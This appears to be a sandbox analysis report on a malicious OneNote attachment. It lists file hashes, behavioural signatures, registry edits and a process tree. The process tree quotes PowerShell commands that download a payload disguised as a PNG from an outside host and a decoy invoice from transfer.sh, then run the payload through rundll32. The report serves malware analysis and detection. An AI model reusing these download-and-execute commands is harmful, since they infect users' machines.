0b77c4eda53491d8e97f4c444b30579850a6396a724eda28288fd8a54cdeafc3

Analysis

max time kernel
103s
max time network
74s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
15/02/2023, 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Feb10_Document-822616.one
Size

259KB
MD5

3192f7c4ed84126690cad40abfcd84e5
SHA1

058387a7c225db2583a2e55b2dd6dceb130be6a0
SHA256

0b77c4eda53491d8e97f4c444b30579850a6396a724eda28288fd8a54cdeafc3
SHA512

d6f44c2545f069ad8944798c682bf4ed1d98b08550a12e25c0bcdcde75926bd1b24e7913a30d07c364aac4eebcd00e6a72adccba07a8f0d68a62a96be94f9105
SSDEEP

6144:7E2Wx+5mj862Wx+5mj8R6c2fI0pxmSDmST:7E2l5s862l5s8WmSDmST

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk	ONENOTE.EXE

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BLANK.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\DESIGNER.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE	ONENOTE.EXE

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	ONENOTE.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	ONENOTE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	ONENOTE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar	ONENOTE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	ONENOTE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	ONENOTE.EXE

Modifies registry class 6 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\ = "Microsoft OneNote 12.0 Object Library"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONENOTE.EXE\\2"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\ = "Microsoft OneNote 14.0 Object Library"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONENOTE.EXE\\3"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ONENOTE.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1308	ONENOTE.EXE
1308	ONENOTE.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2024	powershell.exe
1556	powershell.exe
572	powershell.exe
1168	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: 33	1940	ONENOTEM.EXE
Token: SeIncBasePriorityPrivilege	1940	ONENOTEM.EXE
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: 33	1308	ONENOTE.EXE
Token: SeIncBasePriorityPrivilege	1308	ONENOTE.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1940	ONENOTEM.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1940	ONENOTEM.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE
1308	ONENOTE.EXE

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1308 wrote to memory of 1940	1308	ONENOTE.EXE	30
PID 1308 wrote to memory of 1940	1308	ONENOTE.EXE	30
PID 1308 wrote to memory of 1940	1308	ONENOTE.EXE	30
PID 1308 wrote to memory of 1940	1308	ONENOTE.EXE	30
PID 1308 wrote to memory of 924	1308	ONENOTE.EXE	32
PID 1308 wrote to memory of 924	1308	ONENOTE.EXE	32
PID 1308 wrote to memory of 924	1308	ONENOTE.EXE	32
PID 1308 wrote to memory of 924	1308	ONENOTE.EXE	32
PID 924 wrote to memory of 572	924	cmd.exe	34
PID 924 wrote to memory of 572	924	cmd.exe	34
PID 924 wrote to memory of 572	924	cmd.exe	34
PID 924 wrote to memory of 572	924	cmd.exe	34
PID 924 wrote to memory of 1556	924	cmd.exe	35
PID 924 wrote to memory of 1556	924	cmd.exe	35
PID 924 wrote to memory of 1556	924	cmd.exe	35
PID 924 wrote to memory of 1556	924	cmd.exe	35
PID 924 wrote to memory of 2024	924	cmd.exe	36
PID 924 wrote to memory of 2024	924	cmd.exe	36
PID 924 wrote to memory of 2024	924	cmd.exe	36
PID 924 wrote to memory of 2024	924	cmd.exe	36
PID 924 wrote to memory of 1168	924	cmd.exe	38
PID 924 wrote to memory of 1168	924	cmd.exe	38
PID 924 wrote to memory of 1168	924	cmd.exe	38
PID 924 wrote to memory of 1168	924	cmd.exe	38
PID 2024 wrote to memory of 1152	2024	powershell.exe	42
PID 2024 wrote to memory of 1152	2024	powershell.exe	42
PID 2024 wrote to memory of 1152	2024	powershell.exe	42
PID 2024 wrote to memory of 1152	2024	powershell.exe	42
PID 2024 wrote to memory of 1152	2024	powershell.exe	42
PID 2024 wrote to memory of 1152	2024	powershell.exe	42
PID 2024 wrote to memory of 1152	2024	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\Admin\AppData\Local\Temp\Feb10_Document-822616.one"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
  /tsr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\nFile.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C iwr 'http://tempsolutionsde.com/images/1.gif' -OutFile 'C:\\Users\Public\doufu.png'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C iwr 'https://transfer.sh/get/vpiHmi/invoice.pdf' -OutFile 'C:\\ProgramData\\invoice.pdf'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C "Start-Sleep 12;rundll32 C:\Users\\Public\\doufu.png,CellClearImm"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\\Public\\doufu.png CellClearImm
      4⤵
      PID:1152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C Start-Sleep 6;Start-Process 'C:\\ProgramData\\invoice.pdf'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1168

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\nFile.bat

Filesize
1KB

MD5
e2c327f3229cb6e1b9849d9c39155585

SHA1
c06ac8d48ac278f8159c2a1bf136c7c0b35aeb28

SHA256
aaed16d8c7383e613d315525ded4623d74b0de13d0be9694cfa250ae7b227f5b

SHA512
7154e570c16071d789f3123538381e9dd03be5d4fede154a42e7083591144ad40c39fba33b009b987574223ae5064db9f6386162b2d7c06bcfee7738d7d48724

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
98d69bd215ee0787ec835f5a0db4a00c

SHA1
e68c898485a63200b7a5ef9895ce4847cb5ef31b

SHA256
5c403d3d967159c9561946c577f6a7f1e2b0d2a5789154ce0f8d776c4d3dfeb6

SHA512
8f68c19ed3af6a0e7d96d1a0bc4dfe436f33172473e70951521192201add0c7af53d1e36535199986615274085f522e439080ac78df0299eb78d5b226ea0919d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
98d69bd215ee0787ec835f5a0db4a00c

SHA1
e68c898485a63200b7a5ef9895ce4847cb5ef31b

SHA256
5c403d3d967159c9561946c577f6a7f1e2b0d2a5789154ce0f8d776c4d3dfeb6

SHA512
8f68c19ed3af6a0e7d96d1a0bc4dfe436f33172473e70951521192201add0c7af53d1e36535199986615274085f522e439080ac78df0299eb78d5b226ea0919d

Download Submit
memory/572-76-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/572-74-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/1168-72-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/1168-78-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/1308-54-0x0000000072041000-0x0000000072043000-memory.dmp

Filesize
8KB

Download
memory/1308-56-0x000000007302D000-0x0000000073038000-memory.dmp

Filesize
44KB

Download
memory/1308-77-0x000000007302D000-0x0000000073038000-memory.dmp

Filesize
44KB

Download
memory/1308-55-0x0000000074DA1000-0x0000000074DA3000-memory.dmp

Filesize
8KB

Download
memory/1556-71-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/1556-75-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/2024-73-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download
memory/2024-81-0x000000006B5A0000-0x000000006BB4B000-memory.dmp

Filesize
5.7MB

Download